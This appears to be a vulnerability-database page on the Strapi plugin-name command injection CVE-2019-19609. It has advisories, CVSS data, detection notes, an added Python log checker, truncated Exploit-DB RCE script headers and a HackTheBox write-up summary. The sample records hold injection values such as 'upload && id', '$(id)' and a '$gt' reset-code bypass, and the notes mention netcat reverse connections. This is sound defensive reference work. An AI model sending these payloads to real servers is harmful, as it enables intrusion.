CVE-2019-19609
Published 2019-12-05
PriorityP179high7.2CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 54.08% (98.9th percentile)
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| strapi | strapi | <= 1.6.4 | — |
| strapi | strapi | — | — |
| strapi | strapi | >= 0 < 3.0.0-beta.17.8 | 3.0.0-beta.17.8 |
Detection & IOCs (extracted from sources)
- Detect POST requests to the /admin/plugins/install endpoint with a 'plugin' field containing shell metacharacters such as '&&' or '$(', indicating command injection via the unsanitized plugin name parameter.
- Monitor for POST requests to /admin/plugins/install carrying a JSON body where the 'plugin' value contains shell command substitution patterns (e.g., '$(...)').
- Alert on outbound netcat (nc) connections spawned by the Strapi/Node.js process, particularly to ephemeral attacker-controlled IPs on port 9999, as this is the default exfil port used by the public exploit.
- Detect creation of the file /tmp/.m3 by the Strapi process, which is used as a temporary output buffer by the authenticated RCE exploit.
- Monitor unauthenticated POST requests to /admin/auth/reset-password with a JSON body containing a MongoDB-style operator key '$gt' in the 'code' field, indicating exploitation of CVE-2019-18818 used as a precursor to this RCE.
- Flag requests to the /admin/init endpoint that enumerate the Strapi version, as attackers use this to confirm a vulnerable version (3.0.0-beta.17.4 or lower) before launching the exploit.
- The RCE is blind — command output is not returned inline in the HTTP response; attackers must use out-of-band channels (e.g., netcat reverse shell or curl to an attacker-controlled server) to retrieve results.
- The vulnerability affects Strapi versions up to and including 3.0.0-beta.17.7; the fix was introduced in 3.0.0-beta.17.8.
- The injection point is the unsanitized 'plugin' name field passed to the execa function; both the Install (/admin/plugins/install) and Uninstall plugin endpoints are affected.
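As an added example (not code from the page, the cited advisories, or the exploits listed below), the following Python checker implements the request-level detection notes above: shell metacharacters in the 'plugin' field sent to the plugin install/uninstall routes, and a MongoDB operator object in the 'code' field sent to /admin/auth/reset-password. The install and reset-password paths are taken from the notes; the uninstall route /admin/plugins/uninstall, the tab-separated "METHOD PATH BODY" record format, and the sample records are all constructed assumptions for the demonstration.

```python
import json
import re
from urllib.parse import urlparse

# Routes from the detection notes. The install and reset-password paths are
# on the page; the uninstall path is an assumption (the page names the
# Uninstall endpoint without giving its route).
PLUGIN_ENDPOINTS = {"/admin/plugins/install", "/admin/plugins/uninstall"}
RESET_ENDPOINT = "/admin/auth/reset-password"

# Characters a shell interprets that never occur in a valid npm package name
# (letters, digits, '@', '/', '-', '_' and '.' are all legitimate).
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")


def check_request(method, path, body):
    """Return a list of finding strings for one HTTP request; empty if clean."""
    findings = []
    if method.upper() != "POST":
        return findings
    route = urlparse(path).path.rstrip("/")
    try:
        data = json.loads(body) if body else {}
    except json.JSONDecodeError:
        return findings  # the affected handlers consume a JSON body
    if not isinstance(data, dict):
        return findings

    if route in PLUGIN_ENDPOINTS:
        plugin = data.get("plugin")
        if isinstance(plugin, str) and SHELL_META.search(plugin):
            findings.append(
                f"CVE-2019-19609: shell metacharacters in plugin name {plugin!r} sent to {route}"
            )

    if route == RESET_ENDPOINT:
        code = data.get("code")
        # A legitimate reset code is a string; an object whose key starts with
        # '$' is a MongoDB operator, the CVE-2019-18818 precursor pattern.
        if isinstance(code, dict) and any(k.startswith("$") for k in code):
            findings.append(
                f"CVE-2019-18818: MongoDB operator {sorted(code)} in reset-password 'code' field"
            )
    return findings


def scan_log(lines):
    """Scan constructed tab-separated 'METHOD<TAB>PATH<TAB>BODY' records
    (not a real Strapi log format). Returns [(line_no, findings), ...] for
    every record that produced at least one finding."""
    hits = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        parts = line.rstrip("\n").split("\t", 2)
        method = parts[0]
        path = parts[1] if len(parts) > 1 else "/"
        body = parts[2] if len(parts) > 2 else ""
        findings = check_request(method, path, body)
        if findings:
            hits.append((n, findings))
    return hits


# Constructed sample records: two benign plugin/reset requests, one version
# probe, and three requests matching the patterns in the detection notes.
SAMPLE_LOG = [
    "GET\t/admin/init",
    'POST\t/admin/plugins/install\t{"plugin":"upload"}',
    'POST\t/admin/plugins/install\t{"plugin":"upload && id"}',
    'POST\t/admin/auth/reset-password\t{"code":"f3a9c1","password":"NewPassw0rd!","passwordConfirmation":"NewPassw0rd!"}',
    'POST\t/admin/auth/reset-password\t{"code":{"$gt":""},"password":"NewPassw0rd!","passwordConfirmation":"NewPassw0rd!"}',
    'POST\t/admin/plugins/uninstall/\t{"plugin":"$(id)"}',
]

if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG):
        for finding in findings:
            print(f"record {line_no}: {finding}")
```

The plugin-name check is deliberately a denylist of shell metacharacters rather than a full npm-name validator, so it stays readable in a proxy or WAF rule; the reset-password check keys on the value's JSON type, since a real reset code is always a string and any object there is a query-operator injection attempt regardless of which operator is used.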
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| VulnCheck | — | 7.2 | HIGH | — |
OSV · 2021-12-10 · CVE-2019-19609 [HIGH]
Duplicate Advisory: OS Command Injection in Strapi
### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9p2w-rmx4-9mw7. This link is maintained to preserve external references.
### Original Description
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
GHSA · 2020-09-04 · CVE-2019-19609 [HIGH] · CWE-77
Command Injection in strapi
Versions of `strapi` before 3.0.0-beta.17.8 are vulnerable to Command Injection. The package fails to sanitize plugin names in the `/admin/plugins/install/` route. This may allow an authenticated attacker with admin privileges to run arbitrary commands in the server.
## Recommendation
Upgrade to version 3.0.0-beta.17.8 or later
OSV · 2020-09-04 · CVE-2019-19609 [HIGH]
Command Injection in strapi (mirror of the GHSA advisory above, with the same description and recommendation)
VulnCheck · 2019 · CVSS 7.2 · CVE-2019-19609 [HIGH]
strapi strapi Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
Affected: strapi strapi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2019-19609; https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf
No detection rules found.
Exploit-DB · 2021-08-30 · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
---
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609
#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys
if len(sys.argv) != 2:
print("[-] Wrong number of arguments provided")
print("[*] Usage: python3 exploit.py \n")
sys.exit()
class Terminal(Cmd):
prompt = "$> "
def default(self, args):
code_exec(args)
def check_version():
global url
print("[+] Checking Strapi CMS Version running")
version = requ
Exploit-DB · 2021-08-30 · CVSS 7.2 · CVE-2019-19609 [HIGH]
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609
#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
import requests, sys, os, socket
logoType = ('''
CVE-2019-19609 - Strapi RCE
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
''')
if __name__ == '__main__':
# Parameter checking
if len(sys.argv) != 5:
print(logoType)
print("[!] Some of
CTF writeup · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
Horizontall / README
# Horizontall - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```nmap``` – finding ports ```22``` and ```80```.
***User***: Found subdomain ```api-prod``` in one of the JavaScript files. By enumerating the subdomain we found the login page of a ```Strapi``` system, reset the ```admin``` password using ```CVE-2019-18818```, and using the same exploit wrote our SSH public key to ```/opt/strapi/.ssh/authorized_keys```, which allows us to log in with our SSH private key and get a shell as the ```strapi``` user.
***Root***: Found a local service on port ```8000``` (running as ```root```) which is a ```Laravel``` system. Using ```CVE-2021-3129``` we write our SSH public key to ```/root/.ssh/authorized_keys
CTF writeup · CVSS 6.0 · [MEDIUM]
easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
References
- http://packetstormsecurity.com/files/163940/Strapi-3.0.0-beta.17.7-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.html
- https://bittherapy.net/post/strapi-framework-remote-code-execution/
- https://github.com/strapi/strapi/pull/4636